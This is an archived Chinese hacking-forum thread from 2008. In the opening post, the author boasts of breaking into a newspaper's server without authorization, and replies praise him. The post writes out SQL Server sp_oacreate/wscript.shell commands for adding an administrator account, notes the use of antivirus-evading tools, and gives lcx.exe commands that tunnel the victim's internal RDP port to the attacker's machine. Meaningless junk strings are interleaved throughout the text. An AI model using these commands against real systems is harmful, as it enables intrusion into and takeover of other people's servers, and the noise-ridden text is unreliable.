【3.A.S.T】网络安全爱好者's Archiver

黑客学习

上帝的爱 发表于 2008-11-8 09:39

【原创】小鸡,别跑(内网提权篇)

文章作者:上帝之爱 x-I']Z!ft7\a0p:k{R
原创文章,转载注明出处!d6hV}AZ
在此感谢冰冷的太阳(icysun)的提携!`E4D+o-GJH4{
PX\tG*A.AK#r?,P#i
PS:前言!又是一个双休日!我很喜欢双休日通宵!(似乎全是废话)上线后在那侃的热火朝天,突然太阳发过来一句话:把你的马弄几个过来!我很纳闷啊?不明白!最后问清楚
g$Z"Z~r+o-G 了他是要搞一个站,一句话成功了!但是大马老是被杀或者是其他原因打不开大马地址!我正好也无事干,我跟着他一块干吧!r!}O CVh}
正文:
L,? u7z |    他说是DB权限,我于是打开站点一看,中国XXX报!呵呵呵!不管三七二十一,掂着我的啊D对着他射了起来!如图DB权限!也成功的列出了目录,找到了路径!汗死!太阳都弄1L_V)LyS,]!nza%q
到一句话了,我还在这里浪费什么感情和大好时光啊!问他要了之后,把自己的大马搞了上去,这时候太阳因为群里的事情忙,就先让我搞!大哥发话了,能不听吗?我进去后,
F;~V7W$D 习惯性的扫描了一下端口以及上传了CMD,米有开放43958的端口,最后也米有找到pcanywhere之类的玩意!我人品很是不好,今晚本来就因为之前的龌龊事情郁闷了半天,在太阳面
9p2zaA'ak 前丢大人了,所以这个站的服务器我一定要日下来!既然开放了1433端口,那只有通过SQL来提权了,真他妈的是人倒霉时候,喝凉水都塞牙啊!记得自己的一个工具怎么也找不到%J_qB3eG
了,NND,郁闷!这时候记得他走时候说过conn.asp的路径,我想起了SQL提权!于是我翻了翻聊天记录(他当时说时候,我没仔细看!在虚拟机里,聊QQ很麻烦,所以只是粗略的
Q q|$Sg"r 扫一眼)我去了路径看了看!找到了之后于是准备通过SQL来提权了!这里给不会的朋友说一下命令(也可以自己网上搜索):
dYB#b5JT[ driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。3@AW7Q;uC;O
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码
L8p'G7f4VoV l;{n /add'  --添加新用户。
Nb!v^5MBZ declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup x,o{6e$JQ"X4Q
administrators 新用户 /add'  --把用户加到管理组+i m(P{ Q)b/CdL
      有时候不行的话,不妨去试着激活guest!NND,失败!汗死!那咋办呢?不好意思去问太阳,他当时忙只是粗略的说了几种方法,米有办法,一个一个的测试吧!对了,我bI L w3b'i
刚才不是上传了CMD吗?看看啥系统吧!不错,还可以执行命令!2003的!我记得上次在叶子转的时候,论坛就有一个喜欢检测明星站点的老是说牛人博客上的提权工具!正好我这AC YCs1|*C!q
个不是符合吗?于是立马去down了一个,记得我在C:\Program Files下浏览时候,看到的杀毒软件是卡巴斯基7.0,我害怕被杀啊!那不就更米有戏了吗?我的是NOD32,测试是可l$w N2m7[2vUZ
以的,于是好不容易找了一个装卡巴的朋友让他帮我查杀一下!一会他告诉我:米有被杀!这下我放心了!一路高歌,直接上传上去,还真米有被杀!赶紧添加用户,靠!可以啊
M,Z3f!i ``xH !发现添加上去了,这时候离成功似乎只有一步之遥了!
&Z&Q~W~F bM     这个服务器是内网,那就需要用LCX转发端口了!找了一个免杀的lcx.exe(越来越发现免杀的作用了,日,这幸亏靠前几天死皮赖脸的问朋友要,打死我以后也要学习)lcx的
h k'j;z~#h"g4x 具体使用方法你运行后,会提示的!不会的网上搜搜!于是我设置了路由转发了51端口[:J0d4x"?|6`L
开始在肉鸡上执行:
9p4DK9|$@$?S"u lcx.exe -slave 你的IP 51(端口) 肉鸡IP 3389   
%k#@(fB&XM#N 意思是将肉鸡的3389转发到本机的51端口上
G Pa&z/rF\ }[4f$iF
然后我在本机执行:
YB'S&g` lcx.exe -listen 51 2020
O$]'T,g#kI 意思是监听51端口转发到本机的2020端口上
#a6MO | s p 成功后,CMD下会有显示的,这时候我登陆本地127.0.0.1:2020(不懂的自己理下思路想想)
+\V$z\B H't1M 成功登陆了!郁闷的事情出来,我把刚才添加的账户和密码输入,突然跳出来一个窗口,意思是要有权限,NND,已经是管理员了,还要什么权限!也许是今晚通宵的原因吧!我又B+T.Y }[hL(j
不好意思的去打扰太阳,问他,他说:你确定你输入是你建立的密码?原先脑子糊涂了!竟然忘记建立的密码了,我为了防止别人社工,密码很少一样的!太多了忘记了!最后试
&x;I?b1eu 了三次,把刚才还在脑海印象的三个密码试出来了!被太阳严重鄙视了一下!日,人老了不中用了!重新输入正确账号和密码成功进入,另外也米有发现shift后门,看来这可能是P+O'O!m v
一台干净的服务器,赶紧设置一下,保护“肉鸡”,防止别人把我的“鸡”干了!进去后发现了很多网页,记得114best的时候,是五个站!仔细看了下才知道是一些二级域名。t5N&Vf"ZZ O1[ j ~
这个服务器还不错,配置只能算一般!安装了卡巴和超级巡警!另外我也做了一些设置,也差不多·算安全了,只要管理员不T我,我应该会老老实实呆在这里的!

zhuyahui 发表于 2008-11-8 18:47

。。。
3wS.a3I%b K{/o
3a2pc,W0s@U0B 欢迎 上帝的爱 经常经常回来 授课~

超超 发表于 2008-11-8 19:26

我中午就给审核了!!!!!!!!!!!!!我冤枉啊!!!!!!!!!

zhuyahui 发表于 2008-11-8 19:33

哈哈。9x N$`GM)f3WZ0`4r
提个建议。
'z'[ jj0aHP Eoq 下次麻烦上帝的爱 把图放在你步骤上。
8v$FN9w,c.| 就是说到哪了 就把图帖到那。
:y:{Dpe 谢谢勒~

上帝的爱 发表于 2008-11-8 21:07

[quote]原帖由 [i]zhuyahui[/i] 于 2008-11-8 19:33 发表 [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=26123&ptid=5978][img]http://www.3ast.com.cn/images/common/back.gif[/img][/url] |8r^?Q4r c K9rl{
哈哈。'MpN6I*W0f;J i/J.P
提个建议。
k+u-UxI a9|*W 下次麻烦上帝的爱 把图放在你步骤上。
G,]*ke&O8ep~Nw 就是说到哪了 就把图帖到那。
0FE.dbBr$u4O 谢谢勒~ [/quote]
;r(U0D'n6mO Z-u .\#d!YZs
lL(tfc p }/I3V
比较懒!

hilarylove 发表于 2008-11-9 00:58

上帝的爱。强悍啊。。真够牛逼的,。。。支持

上帝的爱 发表于 2008-11-9 02:26

[quote]原帖由 [i]hilarylove[/i] 于 2008-11-9 00:58 发表 [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=26187&ptid=5978][img]http://www.3ast.com.cn/images/common/back.gif[/img][/url]0yf4T |B%m|&E @
上帝的爱。强悍啊。。真够牛逼的,。。。支持 [/quote]
(fH8YK'P:@Ad;~?)e
/}$rJ+FH s U#l o
]C {Bw]2X'} 努力吧!你有一天会比我更牛逼!到时候你就觉得我是菜鸟了

wmmy 发表于 2008-11-9 05:45

文章没有仔细看,但是看到图上有个DB权限,DB权限可以直接写入启动项提权。可以把这个方法一起写入文章中,并且可以提下如何修补漏洞。 在攻与防的对立统一中寻求突破!!!

無盡空虛 发表于 2008-11-9 10:40

菜鸟有点难啊~~~

猪猪 发表于 2008-11-9 11:58

不按顺序 一下子真看不明白 不适合我们菜鸟看

上帝的爱 发表于 2008-11-9 13:09

[quote]原帖由 [i]wmmy[/i] 于 2008-11-9 05:45 发表 [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=26223&ptid=5978][img]http://www.3ast.com.cn/images/common/back.gif[/img][/url]
kPW(\!g@,Y 文章没有仔细看,但是看到图上有个DB权限,DB权限可以直接写入启动项提权。可以把这个方法一起写入文章中,并且可以提下如何修补漏洞。 在攻与防的对立统一中寻求突破!!! [/quote]Zni6x@4A/bg#J
H?h&g#Xg!k

6T eb,~'@,Yc 写入启动项,呵呵呵!知道,但是你不觉得有点麻烦,直接搞,拿到权限,不是很好!

2046a 发表于 2008-11-14 15:56

~支持原创 ~4G内存:L

冰吻六秒钟 发表于 2010-3-3 18:26

学习下 怎么我不会用工具啊{:Yem62:Y}

lr163 发表于 2010-3-5 19:31

呵呵,学习了,谢谢楼主的分享!

在意z 发表于 2012-5-16 00:16

谢谢楼主分享技术。。。

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.